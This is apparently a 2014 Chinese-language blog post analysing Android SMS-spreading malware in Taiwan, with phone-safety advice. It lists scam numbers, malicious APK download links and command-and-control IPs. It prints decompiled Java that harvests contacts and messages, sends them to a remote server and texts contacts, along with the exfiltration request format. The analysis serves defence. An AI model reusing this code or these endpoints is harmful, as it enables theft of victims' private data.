Sunday, May 18, 2014

android 簡訊病毒:

android 簡訊病毒:

Step 1. 開啟「設定」,選擇「安全性」之後,再取消勾選「未知的來源」 (允許安裝非Market應用程式),如下圖:
經過這樣的設定之後,我們就只能從Google Play上安裝APP,就算去點擊了簡訊的goo.gl超連結,而下載到宅急便的憑證.apk檔案,也再一次不小心又按到了下載後的apk檔案,並且再一次不小心再去點擊了「程式安裝器」,你的手機在安裝時,都會直接將安裝程式給擋下,出現「安裝遭封鎖」的訊息,如下圖:
因此,從另一個角度來看,如果你希望安裝下載來的apk檔案,就必需去勾選這個「未知的來源」,才有辦法安裝。

取消「小額付費」的服務

話說這個小額付費的服務,對於一般人來說,似乎是沒什麼作用…
所以請打各自電信公司的客服,去停了它吧!就算沒有中毒,你也應該去停掉它…
  • 中華電信:手機直撥800,或0800080090客服專線
  • 台灣大哥大:手機直撥 188免費 或 02-66062999
  • 遠傳電信:手機直撥888/123 市話撥449-5888/449-5123
android 簡訊病毒號碼: 0912104628
android 簡訊病毒網址: http://goo.gl/4zjSLG
android 簡訊病毒內容: 您的法院訴訟

android 簡訊病毒網址: https://www.dropbox.com/s/l0lqzrtzqh2d6qd/%E9%80%9A%E7%9F%A5%E5%96%AE.apk


android 簡訊病毒號碼: 0955164020

android 簡訊病毒內容: 您的民事賠償
android 簡訊病毒網址: http://goo.gl/9Ofdu2
android 簡訊病毒網址: https://www.dropbox.com/s/09g745brshb6m73/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
通知單.apk
流量分析: http://goo.gl/#analytics/goo.gl/9Ofdu2/all_time


- Broadcast Receivers
com.example.google.service.MyDeviceAdminReceiver
intent-filter action:android.app.action.DEVICE_ADMIN_ENABLED
com.example.google.service.SMSServiceBootReceiver
intent-filter action:android.intent.action.BOOT_COMPLETED
com.example.google.service.SMSReceiver
intent-filter action:android.provider.Telephony.SMS_RECEIVED
TaskRequest

- Required Permissions
android.permission.READ_PHONE_STATE
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.RECEIVE_SMS
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.RECEIVE_BOOT_COMPLETED


- Used Permissions
android.permission.SEND_SMS
method call:"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call:"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
method call:"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call:"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
android.permission.READ_PHONE_STATE
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getLine1Number()Ljava/lang/String;"
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getDeviceId()Ljava/lang/String;"
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSimSerialNumber()Ljava/lang/String;"
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSubscriberId()Ljava/lang/String;"
android.permission.VIBRATE
method call:"Landroid/support/v4/app/NotificationCompat$Builder/setDefaults(I)Landroid/support/v4/app/NotificationCompat$Builder;" calls"Landroid/app/Notification/Idefaults"
method call:"Landroid/support/v4/app/NotificationCompatHoneycomb/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap;)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call:"Landroid/support/v4/app/NotificationCompatIceCreamSandwich/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call:"Landroid/support/v4/app/NotificationCompatJellybean/(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z Z I Ljava/lang/CharSequence;)V" calls "Landroid/app/Notification/Idefaults"
android.permission.ACCESS_NETWORK_STATE
method call:"Landroid/support/v4/net/ConnectivityManagerCompat/getNetworkInfoFromBroadcast(Landroid/net/ConnectivityManager; Landroid/content/Intent;)Landroid/net/NetworkInfo;" calls "Landroid/net/ConnectivityManager/getNetworkInfo(I)Landroid/net/NetworkInfo;"
method call:"Landroid/support/v4/net/ConnectivityManagerCompatGingerbread/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call:"Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call:"Landroid/support/v4/net/ConnectivityManagerCompat$BaseConnectivityManagerCompatImpl/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
android.permission.CHANGE_COMPONENT_ENABLED_STATE
method call:"Lcom/example/google/service/MainActivity/HideIcon()V" calls"Landroid/content/pm/PackageManager/setComponentEnabledSetting(Landroid/content/ComponentName; I I)V"
android.permission.WAKE_LOCK
method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager/newWakeLock(I Ljava/lang/String;)Landroid/os/PowerManager$WakeLock;"
method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/completeWakefulIntent(Landroid/content/Intent;)Z" calls"Landroid/os/PowerManager$WakeLock/release()V"
method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager$WakeLock/acquire(J)V"
android.permission.READ_CONTACTS
method call:"Lcom/example/google/service/ContactsHelper/getPhoneContactNumbers()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
method call:"Lcom/example/google/service/ContactsHelper/getPhoneContacts()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
android.permission.INTERNET
method call:"Lcom/example/google/service/HttpHelper/callWS(Ljava/lang/String;)Ljava/lang/String;" calls "Lorg/apache/http/impl/client/DefaultHttpClient/()V"

- Used Features
android.hardware.telephony
android.hardware.touchscreen
net:
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

leak:
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069070000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069108000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

dns:
muc03s07-in-f14.1e100.net 

http:
Request: GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic;10
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new

tcp:
173.194.44.14:443
android 簡訊病毒號碼: 0926566920
android 簡訊病毒內容: 宅急便 快遞
android 簡訊病毒網址: http://goo.gl/6yOcoV (無法下載)
android 簡訊病毒網址: https://www.dropbox.com/s/9llco6cqo0rxyup/%E6%86%91%E8%AD%89.apk?m=
2014-06-02 19:07:04 ERROR 509: Bandwidth Error.
流量分析: http://goo.gl/#analytics/goo.gl/6yOcoV/all_time

android 簡訊病毒號碼: 0933398720
android 簡訊病毒內容: 宅急便 快遞
android 簡訊病毒網址: http://goo.gl/6fs5jx  (已分析)
android 簡訊病毒網址: https://www.dropbox.com/s/rr5xv3qsn7815u0/%E9%9B%BB%E5%AD%90%E8%A1%A8%E5%96%AE.apk?m=
電子表單.apk
流量分析: http://goo.gl/#analytics/goo.gl/6fs5jx/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
NameQuery TypeQuery ResultSuccessfulProtocol
ybbcel888.vicp.cc DNS_TYPE_A 220.136.223.64 udp 
ybbcel999.eicp.net DNS_TYPE_A 220.136.213.43 udp
tcp:220.136.223.64:9090

Ad-Aware Android.Trojan.SMSSend.ND 20140602
AegisLab SUSPICIOUS 20140602
AhnLab-V3 Android-Malicious/Litch 20140602
AntiVir Android/SmsAgent.EB.Gen 20140602
Avast Android:RuSMS-AH [Trj] 20140602
BitDefender Android.Trojan.SMSSend.ND 20140602
DrWeb Android.SmsBot.72.origin 20140602
ESET-NOD32 a variant of Android/TrojanSMS.Agent.ADD 20140602
Emsisoft Android.Trojan.SMSSend.ND (B) 20140602
F-Secure Trojan:Android/SmsSend.IE 20140601
GData Android.Trojan.SMSSend.ND 20140602
Kaspersky HEUR:Trojan-Spy.AndroidOS.SmForw.al 20140602
MicroWorld-eScan Android.Trojan.SMSSend.ND 20140602
Sophos Andr/SMSSend-EC

android 簡訊病毒號碼: 0961267359
android 簡訊病毒內容: 宅急便 快遞
android 簡訊病毒網址: http://goo.gl/58ooGF (無法下載)
android 簡訊病毒網址: https://www.dropbox.com/s/iweqcsh4vp9g5f3/%E6%86%91%E8%AD%89.apk?m=
憑證.apk
http://goo.gl/#analytics/goo.gl/58ooGF/all_time

Error (509)

This account's public links are generating too much traffic and have been temporarily disabled!

android 簡訊病毒內容:  黑貓宅急便
android 簡訊病毒網址:  http://goo.gl/em7bab   (已分析)
[application/vnd.android.package-archive]
android 簡訊病毒網址:  https://www.dropbox.com/s/plym2gpyohf9n7a/%E6%86%91%E8%AD%89.apk?m=
http://goo.gl/#analytics/goo.gl/em7bab/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
NameQuery TypeQuery ResultSuccessfulProtocol
ybbcel999.eicp.net DNS_TYPE_A 61.228.130.24 udp 
ybbcel888.vicp.cc DNS_TYPE_A 220.136.213.160 udp
android 簡訊病毒內容:  黑貓宅急便(2)
 android 簡訊病毒網址: http://goo.gl/SOkMHW   (已分析)
android 簡訊病毒網址:  https://www.dropbox.com/s/zv1f6h6rezcuttt/%E6%86%91%E8%AD%89.apk
http://goo.gl/#analytics/goo.gl/SOkMHW/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
NameQuery TypeQuery ResultSuccessfulProtocol
buyaoa1.vicp.co DNS_TYPE_A 111.249.169.13 udp 
yemian3.vicp.co DNS_TYPE_A 220.136.220.151 udp
tcp:111.249.169.13:9090

android 簡訊病毒內容:  張瑞芬您申請網上支付電費
android 簡訊病毒網址:  http://goo.gl/k0jo8D   (已分析)
[application/vnd.android.package-archive]
http://goo.gl/#analytics/goo.gl/k0jo8D/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
NameQuery TypeQuery ResultSuccessfulProtocol
ybbcel999.eicp.net DNS_TYPE_A 61.228.130.220 udp 
ybbcel888.vicp.cc DNS_TYPE_A 61.228.131.215 udp

android 簡訊病毒內容:  您的快遞簽收通知單
android 簡訊病毒網址:  http://goo.gl/1MN94O   (已分析)
android 簡訊病毒網址:  https://www.dropbox.com/s/62556lg017ht0du/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
http://goo.gl/#analytics/goo.gl/1MN94O/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/msc.switchlib.act/lib/libbsvsv.so 0x40516898
Trying to load lib /data/data/msc.switchlib.act/lib/libbsomd.so 0x40516898
dns:

NameQuery TypeQuery ResultSuccessfulProtocol
xdynfa.vicp.co DNS_TYPE_A 211.20.68.250 
boyiis.iego.cn DNS_TYPE_A 114.25.31.243 
android.clients.google.com DNS_TYPE_A 173.194.116.162 173.194.116.163 173.194.116.164 173.194.116.165 173.194.116.166 173.194.116.167 173.194.116.168 173.194.116.169 173.194.116.174 173.194.116.160 173.194.116.161 
162.116.194.173.in-addr.arpa DNS_TYPE_PTR 

service:
TimestampService Name
3.232com.android.vending.util.WorkService
3.232com.android.vending.util.WorkService
11.234msc.switchlib.act.BaseService
22.241com.android.music.MediaPlaybackService
23.236com.android.music.MediaPlaybackService
23.237com.android.music.MediaPlaybackService
24.241com.android.music.MediaPlaybackService
24.242com.android.music.MediaPlaybackService
25.237com.android.music.MediaPlaybackService
30.232com.android.music.MediaPlaybackService
31.237com.android.music.MediaPlaybackService
60.249com.android.music.MediaPlaybackService
60.249com.android.music.MediaPlaybackService
72.252msc.switchlib.act.BaseService
78.253msc.switchlib.act.BaseService
162.486com.android.mms.transaction.SmsReceiverService
162.487com.android.mms.transaction.SmsReceiverService
167.490msc.switchlib.act.BaseService
179.985msc.switchlib.act.BaseService
179.986msc.switchlib.act.BaseService
179.986com.android.email.service.EmailBroadcastProcessorService
179.986com.android.email.service.EmailBroadcastProcessorService
179.986com.google.android.gsf.checkin.CheckinService
179.986com.google.android.gsf.checkin.CheckinService
179.986com.android.exchange.SyncManager
180.991com.google.android.gsf.update.SystemUpdateService
180.991com.google.android.gsf.update.SystemUpdateService
180.991com.google.android.partnersetup.AppHiderService
180.992com.google.android.partnersetup.AppHiderService
180.992com.android.providers.downloads.DownloadService
180.992com.android.providers.downloads.DownloadService
181.986com.android.mms.transaction.SmsReceiverService
181.986com.android.mms.transaction.SmsReceiverService
181.986com.android.providers.media.MediaScannerService
181.986com.android.providers.media.MediaScannerService
181.986com.android.vending.util.AlarmService
181.986com.android.vending.util.AlarmService
182.991com.android.providers.calendar.EmptyService
182.991com.android.bluetooth.opp.BluetoothOppService
182.991com.android.bluetooth.opp.BluetoothOppService
182.991com.google.android.gm.MailIntentService
182.992com.google.android.gm.MailIntentService
182.992com.google.android.gm.downloadprovider.DownloadService
182.992com.google.android.gm.downloadprovider.DownloadService
187.998com.google.android.gsf.checkin.CheckinService
187.998com.google.android.gsf.checkin.CheckinService
187.998com.google.android.gsf.update.SystemUpdateService
187.998com.google.android.gsf.update.SystemUpdateService
189.998com.google.android.partnersetup.AppHiderService
189.999com.google.android.partnersetup.AppHiderService
197.993com.google.android.gsf.checkin.CheckinService
197.993com.google.android.gsf.checkin.CheckinService
197.993com.google.android.gsf.checkin.EventLogService
197.993com.google.android.gsf.checkin.EventLogService
197.993com.android.providers.calendar.EmptyService
197.993com.google.android.gsf.checkin.EventLogService
197.994com.google.android.gsf.checkin.EventLogService
207.413com.google.android.gsf.checkin.CheckinService
207.413com.google.android.gsf.checkin.CheckinService
207.413com.google.android.gsf.update.SystemUpdateService
207.413com.google.android.gsf.update.SystemUpdateService
209.412com.google.android.partnersetup.AppHiderService
209.412com.google.android.partnersetup.AppHiderService
android 簡訊病毒內容:  宅急便快遞通知
android 簡訊病毒網址:  wget http://goo.gl/6U6J3B  (無法下載)
android 簡訊病毒網址:  https://www.dropbox.com/s/g4c8e9zp8dqqhk5/%E6%86%91%E8%AD%89.apk?m=
ERROR 509: Bandwidth Error.
http://goo.gl/#analytics/goo.gl/6U6J3B/all_time

android 簡訊病毒內容:  瑞芬找到你了
android 簡訊病毒網址:  wget http://goo.gl/976Zaj (無法下載)
android 簡訊病毒網址:  http://211.44.3.186/11/index.php
http://goo.gl/#analytics/goo.gl/976Zaj/all_time

用電腦開時,他會去判斷這是電腦,所以就導到新聞網頁去
但如果用手機開啟,就會讓你下載apk檔

再來分析一下註冊的IP
211.44.3.186
經過whois的查詢
是註冊在 Korea Network infomation Center(韓國網路資訊中心)

想也知道宅配公司怎麼可能會用韓國的IP

android 簡訊病毒內容:  您正在申請網上支付電費
android 簡訊病毒網址:  wget http://goo.gl/UB9zBa (無法下載)
android 簡訊病毒網址:  http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
通知單.apk
http://goo.gl/#analytics/goo.gl/UB9zBa/all_time

詐騙簡訊內容:您正在申請網上支付103年2月電費共計367元, 若非本人操作, 請查看電子憑證進行取消 http://goo.gl/UB9zBa 

點選會到http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk下載apk,若開啟安裝,則出現:

資安分析:

1. 這隻惡意apk可以讀取手機:通訊錄朋友的姓名電話、簡訊SMS訊息,會把使用者的手機號碼上傳至203.69.59.153 這一個IP:
[GET] http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=[TelNum]
2. IP使用whois系統查詢 http://www.whois365.com/tw/ip/203.69.59.153 
顯示為中華電信所管轄的IP,可能是客戶租用的IP主機被駭?
3. 駭客持續的攻擊分佈集中在下述日期:3/26:1706次、3/31:2946次、4/3:3873次、4/7:4869次。 目前總計超過31000次。(以上數字依照使用者點選短網址統計報表,但有警覺性的使用者,真實攻擊次數更多)直至本篇截稿前,該被駭IP的網路服務仍然存在。
  
最近非常夯的簡訊病毒,很多朋友都有收到這樣的簡訊,我的 Android 手機也收到好幾次,
不過,既然自己接觸 Android 也有不短的時間了,那就剛好發揮一下專業來看看這個病毒到底會做些什麼事情。
Android APK
程式包裝是著名的容易反組譯,幾年前也剛好有個很強的反組譯軟體dex2jar 出現,搭配 JD-GUI 還能很容易的看到反組譯出來的原始碼,大家有興趣也可以試試看。

如果想要知道怎麼反組譯,可以參考下面的步驟,

1.
安裝好 dex2jar JD-GUI
2.
command line 執行
        $> dex2jar.sh apkfile

   
這樣會在資料夾內產生一個名為 apkfile_dex2jar.jar 的檔案
3.
JD-GUI 打開該檔案就可以看到原始碼

-----
下面總結一下這個簡訊病毒的相關實作細節,
這個病毒會取得下面這些權限,

    android.permission.READ_PHONE_STATE
    android.permission.SEND_SMS
    android.permission.READ_SMS
    android.permission.WRITE_SMS
    android.permission.RECEIVE_SMS
    android.permission.INTERNET
    android.permission.CALL_PHONE
    android.permission.READ_CONTACTS
    android.permission.WRITE_EXTERNAL_STORAGE
    com.android.launcher.action.INSTALL_SHORTCUT

這些權限都是跟簡訊和聯絡人資料有關,跟我們所知道的病毒行為相符。

我們從 AndroidManifest.xml 可以看得出來它有三個關鍵組件,
        ".SMSServices">
            
                "com.example.android.services.SMSServices" />
            

        

        "SMSServiceBootReceiver">
            
                "android.intent.action.BOOT_COMPLETED" />
            

        


         android:name="SMSSender" />

每次手機開機,SMSServiceBootReceiver 都會收到 Broadcast,裡面的行為就是啟動 SMSService,所以手機重開機也無法停止病毒的行動。
public class SMSServiceBootReceiver extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Intent localIntent = new Intent();
    localIntent.setAction("com.example.android.services.SMSServices");
    paramContext.startService(localIntent);
  }
}

這個病毒的預設起始元件是 MainActivity,剛啟動時會去檢查是不是用 Emulator 執行該 APK,看來是怕被 try 病毒行為,可能也跟他的 Server 有關係吧。

剛剛有提到手機開機就會去執行 SMSService,另外,一旦我們執行這個程式後,SMSService 也會被啟動,基本上就是要確保 SMSService 能夠被運行起來。

SMSService 裡面會啟動 SMSObserver SMSSender,接下來我們再來看這幾個部分。

SMSObserver
的部分,他會去看你的簡訊收件匣裡面所有未讀的簡訊,並把你收到的簡訊內容截取出來,最後將這些簡訊的內容送出到遠端 Server,內容會包含下面幾個資訊,

·                     你自己的手機號碼
·                     來訊者的手機號碼
·                     訊息內容
·                     訊息傳送時間
傳送到遠端 Server 的方式,看起來是一台 Microsoft-IIS/7.0 Server,似乎是用 ASP.NET 寫的 WebService,下面是他傳送到 Server format,使用 GET operation,基本上,後續的相關行為都會傳到該 Server,而且 Server 會回傳一些內容,作為 Client 的使用,但我嘗試用 Postman 送些 Request 過去,似乎沒有接到任何回傳,Server 可能有擋一些濫用 API 的行為,但也可能是我下的 Http Request 格式還是有問題吧。

        http://101.55.13.43/sms/SMSHandler.ashx?t=r&p=你的手機號碼&a=朋友的手機號碼&m=訊息內容&d=傳送時間

這樣的 Request 出去實在很可怕,遠端 Server 應該會把這些資料都記起來,又可以再販賣個資,也可以作為日後發送簡訊的內容參考,甚至是增進社交工程的技術,現在透過網際網路,所有資訊的流通都很迅速,經由連網裝置,一旦有機可乘,就能很容易地竊取到私密資料,太可怕了。

SMSSender 的部分,它被啟動時,會去運行 Contact class 裡面的程式碼,
public void Send()
  throws UnsupportedEncodingException, ParserConfigurationException, InterruptedException
{
  ArrayList localArrayList = new ContactsHelper(this._Context).GetAllContacts();
  WebServiceCalling localWebServiceCalling = new WebServiceCalling(this._Context);
  String str1 = Tools.getPhoneNumber(this._Context);
  String str2 = "";
  Iterator localIterator = localArrayList.iterator();
  while (true)
  {
    if (!localIterator.hasNext())
    {
      if (str2.length() > 0)
        localWebServiceCalling.SC(null, str1, str2);
      return;
    }
    String str3 = (String)localIterator.next();
    str2 = str2 + "," + str3;
    if (str2.length() > 20)
    {
      localWebServiceCalling.SC(null, str1, str2);
      str2 = "";
    }
  }
}

這部分會去看你手機上的通訊錄,把通訊錄上所有聯絡人都擷取出來,然後傳送到遠端 Server,傳送內容會包含,
·                     你自己的手機號碼
·                     聯絡人名稱
·                     聯絡人手機號碼
另外,它也會傳送簡訊給其他聯絡人,
localSmsManager.sendTextMessage(str8.trim(), null, str9, null, null);
  localWebServiceCalling.log("SMS", "S", str1, str8 + "|" + str9);

60秒它就會傳送你的聯絡人資料到遠端 Server 並傳送簡訊給其他聯絡人,

public static void sendUpdateBroadcastRepeat(Context paramContext)
{
  PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, SMSSender.class), 0);
  long l = SystemClock.elapsedRealtime();
  ((AlarmManager)paramContext.getSystemService("alarm")).setRepeating(2, l, 60000L, localPendingIntent);
}
另外看到所有的 Http GET 操作,都會再把 Http Response 的內容透過 Message 丟給注入的 Handler 做其他處理。
new Thread(new Runnable()
{
  public void run()
  {
    try
    {
      String str = WebServiceCalling.this.callWS(paramString);
      if (paramHandler != null)
      {
        Message localMessage = new Message();
        localMessage.what = paramInt;
        localMessage.obj = str;
        paramHandler.sendMessage(localMessage);
      }
      return;
    }
    catch (UnsupportedEncodingException localUnsupportedEncodingException)
    {
      localUnsupportedEncodingException.printStackTrace();
      return;
    }
    catch (ParserConfigurationException localParserConfigurationException)
    {
      localParserConfigurationException.printStackTrace();
    }
  }
}).start();
簡訊內容的來源是遠端server,所以應該可以很快地改變訊息發送的內容,也可以依據狀況改變要發送的連結內容。
另外,他還會監控你的來電,當有手機來電時,會將電話轉到 #,這是我不太理解的部分,不清楚轉號碼到這個 # 號會變怎麼樣,是會接掛斷電話?還是跟 USSD 漏洞有關係?
-----
以上就是病毒程式碼大致的狀況,雖然這個病毒還需要安裝執行才會有作用,不過對於一般人來說,應該比較難警覺到 App 有詐。因為一旦被感染後,病毒就可以直接存取聯絡人資料,所以傳播速度真是非常快,這些病毒的猖獗真是可怕。